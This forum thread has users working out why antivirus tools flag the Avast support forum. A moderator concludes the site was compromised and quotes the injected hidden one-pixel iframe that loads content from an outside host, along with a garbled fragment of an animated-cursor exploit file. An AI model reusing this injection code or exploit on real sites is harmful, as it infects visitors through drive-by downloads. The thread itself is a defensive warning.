Get this folks...

[JeremyWW]

Alwil's credibility just hit the ground floor like an elevator with the wires cut...

Go here and see what NOD32 does: h__p://forum.avast.com/

[The_Duality]

Quote:

Originally Posted by JeremyWW

Alwil's credibility just hit the ground floor like an elevator with the wires cut...

Go here and see what NOD32 does: h__p://forum.avast.com/

Hmm... surprising, yet common sense says FP.

[JeremyWW]

Possibly, BUT...Avast! itself picks it up...so their own signatures are picking it up on their own site!

[flyrfan111]

F-Prot flags it also. Starting to sound like a legit detection. It isn't on Avast's site though, you are getting redirected to Media Count. It only works in IE. FF and Opera don't get it, at least on my system.

[JeremyWW]

Exactly, which is why I just uninstalled Avast!, wrote a fairly abrupt e-mail to their research team and came back here looking for sanity! I think I found it in the form of NOD32 AV Beta. I've been a long term NOD32 user and I've been waiting for this...at last...!!!

[flyrfan111]

Run an On Demand Scan and then look at your log.

[The_Duality]

Oooer

This cannot be good. Picked up in Firefox and IE. If other AVs are picking it up then something is a bit fishy.

[JeremyWW]

Quote:

Originally Posted by flyrfan111

Run an On Demand Scan and then look at your log.

Doing it now...

[flyrfan111]

Quote:

Originally Posted by The_Duality

Oooer

This cannot be good. Picked up in Firefox and IE. If other AVs are picking it up then something is a bit fishy.

I only get it in IE, not in FF, perhaps that ad blocking plug in stops it.

[JeremyWW]

Quote:

Originally Posted by JeremyWW

Doing it now...

In depth scan finished: Clean machine...

[flyrfan111]

Quote:

Originally Posted by JeremyWW

In depth scan finished: Clean machine...

Look at the log, do you have a bunch of "internal errors"?

[raven211]

Haven't made a scan yet - might do it later, just to see if NOD32 picks something up in general. I got the warning/infection message in Opera though.

[The_Duality]

I think the internal errors are only related to the new ESS/NOD32 AV beta. NOD 2.7 is running fine - no internal errors or anything like that here.

[JeremyWW]

Quote:

Originally Posted by flyrfan111

Look at the log, do you have a bunch of "internal errors"?

No. I'm looking for that specific string, yes? Nothing...

OK...just one, but nothing to do with anything...

24/08/2007 23:03:56 D:\APPS\INSTALL PACK\Microsoft\Powerpoint Hotfix\258563_intl_i386_zip.exe » ZIP » office2003-KB912022-GLB.exe - internal error

[LoneWolf]

Noticed this earlyer.
Thought LSP was giving me a FP.
Maybe not.
Site may have been hacked
I know this has happened to other sites forum and not in the past.
Anyone else can confirm this?

[flyrfan111]

Quote:

Originally Posted by The_Duality

I think the internal errors are only related to the new ESS/NOD32 AV beta. NOD 2.7 is running fine - no internal errors or anything like that here.

Correct, 2.7 works like a charm.

[JeremyWW]

Quote:

Originally Posted by LoneWolf

Noticed this earlyer.
Thought LSP was giving me a FP.
Maybe not.
Site may have been hacked
I know this has happened to other sites forum and not in the past.
Anyone else can confirm this?

Yup...

[flyrfan111]

Quote:

Originally Posted by JeremyWW

No. I'm looking for that specific string, yes? Nothing...

OK...just one, but nothing to do with anything...

24/08/2007 23:03:56 &nbsp:\APPS\INSTALL PACK\Microsoft\Powerpoint Hotfix\258563_intl_i386_zip.exe » ZIP » office2003-KB912022-GLB.exe - internal error

I have thousands of them. 228 pages in a word document!!

[The_Duality]

Hacking is looking quite likely here

[flyrfan111]

Quote:

Originally Posted by The_Duality

Hacking is looking quite likely here

Yup. Sure looks that way(More Likely). Or quite a few different AV's and Link Scanner are giving FPs(Less Likely).

[Bubba]

We'll alter the clickable links for the time being until it's determined what....IF anything is going on. We'll also caution any that wish to still visit the link.

<iframe src='h__p://mediacount.net/strong/020sdsfg' width=1 height=1></iframe>

Thanks
Bubba

[The_Duality]

I guess it is possible that it could be an FP. it is an ad/media link being flagged, so it may be the way that the Ad/link is implemented that appears malicious. Could happen. *shrugs*

[raven211]

Hehe.. Just a bit funny though that many others detect it also then.

[The_Duality]

Thats what I mean. It may be a suspicious implementation of something that is triggering the AV response. Of course, it may most likely be a real threat. Havent seen one in months

Quite exciting to get a real alert for once...

[Bubba]

Quote:

Originally Posted by The_Duality

Of course, it may most likely be a real threat.

It is a real threat at the moment due to the iframe code and link still available at Avast.

Windows Animated Cursor Stack Overflow Vulnerability

portion of the ani code from the mediacount.net/strong/020sdsfg/324123.htm link

Quote:

RIFFACONanih$$ÿÿ 
TSILTSILanih¨ ¢@ 1Éf�Á8ë^ëèøÿÿÿƒÆ

We have also moved this to a more appropriate forum so others that visit the Avast Forums can be made aware.

Procede with caution,
Bubba